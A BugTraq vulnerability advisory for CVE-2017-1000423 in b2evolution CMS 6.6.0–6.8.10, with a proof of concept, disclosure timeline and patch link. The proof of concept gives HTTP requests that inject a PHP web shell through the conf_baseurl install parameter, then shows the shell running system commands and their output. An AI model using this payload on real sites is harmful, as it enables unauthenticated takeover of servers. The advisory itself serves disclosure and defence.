BugTraq
b2evolution CMS 6.6.0 - 6.8.10 PHP code execution Jan 02 2018 08:00AM
Anti Räis (antirais gmail com)
b2evolution CMS 6.6.0 - 6.8.10 PHP code execution
#################################################

Information
===========

Name: b2evolution CMS 6.8.10
Software: b2evolution CMS
Homepage: http://b2evolution.net/
Vulnerability: PHP code execution
Prerequisites: publicly accessible /install functionality
CVE: CVE-2017-1000423
Credit: Anti Räis
HTML version: https://bitflipper.eu

Description
===========

Unauthenticated user with access to `/install` functionality can
configure the
application installation parameters and complete the installation. This
functionality can be used to execute PHP code on the server.

Proof of Concept
================

Application needs to be installed and configured after coping the source
code
to the server. After installation and configuration (`/install`) is
complete,
the application will create a `/conf/_basic_config.php` file. It contains
database connection credentials and other settings. Unauthenticated attacker
with access to `/intall` functionality can use it to execute PHP code by
injecting it into different values.

Following scenario demonstrates the issue on Apache web-server.

Following request is made after base configuration is completed:
================[ src start ]================
POST /install/index.php HTTP/1.1
Host: victim.site
Content-Length: 214
Content-Type: application/x-www-form-urlencoded
Connection: close

conf_db_host=localhost&conf_db_name=b2evolution&conf_db_user=root&
conf_db_password=root&conf_baseurl=http%3A%2F%2Fvictim.site%2F&
conf_admin_email=admin%40localhost&submit=Update+config+file&
action=conf&locale=en-US
================[ src end ]==================

Application creates the `/conf/_basic_config.php` using user supplied
values:

================[ src start ]================
...
/**
* MySQL DB settings.
* Fill in your database details (check carefully or nothing will work!)
*/
$db_config = array(
'user' => 'root', // your MySQL username
'password' => 'root', // ...and password
'name' => 'b2evolution', // the name of the database
'host' => 'localhost', // MySQL Server (typically 'localhost')
);
...
$baseurl = 'http://victim.site/';
...
$admin_email = 'admin@localhost';
...
================[ src end ]==================

In case the application is installed on public server, the installation
functionality is publicly accessible to everyone accessing the vulnerable
site. Assuming that the attacker manages to find a application in this
state,
before the initial installation in completed, they can use previously
described
request to execute PHP code on the victim's server.

Following parameters are vulnerable and can be used for this attack:
* conf_db_tableprefix
* conf_admin_email
* conf_baseurl

Let's use `conf_baseurl` for example. Attacker specifies the following
value as
base URL:

================[ src start ]================
http://victim.site/\\';$r=$_REQUEST;if(isset($r[0])){$r[0]($r[1]);}/*
================[ src end ]==================

After finishing the basic setup, following request is made.

================[ src start ]================
POST /install/index.php HTTP/1.1
Host: victim.site
Content-Length: 319
Content-Type: application/x-www-form-urlencoded
Connection: close

conf_db_host=localhost&conf_db_name=b2evolution&conf_db_user=root&
conf_db_password=root&
conf_baseurl=http%3A%2F%2Fvictim.site%2F%5C%5C%27%3B%24r%3D%24_REQUEST%3
Bif
%28isset%28%24r%5B0%5D%29%29%7B%24r%5B0%5D%28%24r%5B1%5D%29%3B%7D%2F*&
conf_admin_email=admin%40localhost&submit=Update+config+file&action=conf
&
locale=en-US
================[ src end ]==================

Application creates the `/conf/_basic_config.php` using attacker given
values:

================[ src start ]================
...
/**
* MySQL DB settings.
* Fill in your database details (check carefully or nothing will work!)
*/
$db_config = array(
'user' => 'root', // your MySQL username
'password' => 'root', // ...and password
'name' => 'b2evolution', // the name of the database
'host' => 'localhost', // MySQL Server (typically 'localhost')
);
...
$baseurl = 'http://victim.site/\\';$r=$_REQUEST;
if(isset($r[0])){$r[0]($r[1]);}/*/';
...
$admin_email = 'admin@localhost';
...
================[ src end ]==================

Attacker can use the PHP shell to execute code and take control of the site:
view-source:http://victim.site/install/index.php?0=system&1=ls%20-lah;pw
d

================[ src start ]================

total 676K
drwxrwxrwx 1 vagrant vagrant 4.0K Jul 23 00:26 .
drwxrwxrwx 1 vagrant vagrant 4.0K Jul 23 00:36 ..
-rw-rw-rw- 1 vagrant vagrant 60K Jul 23 00:26 _functions_create.php
-rw-rw-rw- 1 vagrant vagrant 2.2K Jul 23 00:26 _functions_delete.php
-rw-rw-rw- 1 vagrant vagrant 349K Jul 23 00:26 _functions_evoupgrade.php
-rw-rw-rw- 1 vagrant vagrant 60K Jul 23 00:26 _functions_install.php
-rw-rw-rw- 1 vagrant vagrant 14K Jul 23 00:26 automated-install.html
-rw-rw-rw- 1 vagrant vagrant 13K Jul 23 00:26 debug.php
-rw-rw-rw- 1 vagrant vagrant 831 Jul 23 00:26 index.html
-rw-rw-rw- 1 vagrant vagrant 52K Jul 23 00:26 index.php
-rw-rw-rw- 1 vagrant vagrant 16K Jul 23 00:26 license.txt
-rw-rw-rw- 1 vagrant vagrant 523 Jul 23 00:26 phpinfo.php
drwxrwxrwx 1 vagrant vagrant 4.0K Jul 23 00:26 test
/var/www/b2evolution/install
...
================[ src end ]==================

Impact
======

Unauthenticated attacker can execute PHP code on the server. This can be
used
to further compromise the site and hide the initial shell on the server.

Conclusion
==========

Unrestricted access to basic install functionality allows unauthenticated
attacker to execute PHP code on the server and compromise the site.

New release has been made available to mitigate this issue:

* http://b2evolution.net/downloads/6-9-3

Timeline
========

* 08.08.2017 | me | vulnerability discovered
* 08.08.2017 | me > developer | contacted the developer
* 09.08.2017 | developer | vulnerability patched
* 12.08.2017 | me > DWF | CVE requested
* 12.08.2017 | me > developer | asked about patch release estimate
* 25.08.2017 | developer > public | new release with patch made available
* 31.08.2017 | me > public | full disclosure
* 29.12.2017 | DWF > me | CVE assigned

---
Anti Räis
Blog: https://bitflipper.eu
Pentester at http://www.clarifiedsecurity.com
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: GnuPG v2

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
YdsJAvy4iFADv/0LNPtL+V82c4sibSTu
=eSCk
-----END PGP PUBLIC KEY BLOCK-----
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2

iQIcBAEBCAAGBQJaSzwLAAoJEJi8ghYKH/QMiR4QALi8ecFcKVtojqpjp5oa67/b
wCpWhxxeCbRfqeC13s5HVJcXYuQ9+z9ikF/5hfEH2d0fA2+TrmBD5SUX7Fx7NJqT
sA0hoqhblzh6JC8vkgU+rglMxS5v7vTYPd5vbgLvx1oeZZoL+pkMsmT0IOoxIY3A
3aYPr+W/ibw27CvGNcypsJHBGlrC33FmIU1rOZ2/mybofSLLCvBISScD58nouokD
InaCmU2m3ymV5BQMs21Fm7L8NVd87/42mE+97umfj5NKNjIeN9yazcmjeqi8TUUQ
/TyABRfXYVNbFl7Ggjbm4/syEosf+x03rfAh8ZIKwotKi5fOfVty+9EY2TmBy64Q
gPE7XjEFSuwXX8LLUNaW7G7HCrpKlD1N0lwnLc/yDEUpE4riONa3hbj3462pfZB8
DR5g4x6idzXjDoMdaCq3HO9gQV63tzF0sMD34hrgdq7iqgxSAc0zGdGbU8zUoCxS
naNnw7bqbCPr/D/cLVH+Uzs48huUNhg8fdfITqjl6+FOl0rQzNw9Lf5iHZZj2Fr2
Pn6N1sh9K3haFsd6CiPSleerUZnm5xnz2CtZIPALrVKn4fnNGQnkkRp2rjD4Wbj9
0ntICIubMUONyYMrFAOrNo6LL8/5IlfIi5lRbcV5FhqyfoFW7/Fnyc/fiAypQEXK
qIAJHgAbfy4bBFaUHv3L
=noJm
-----END PGP SIGNATURE-----

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus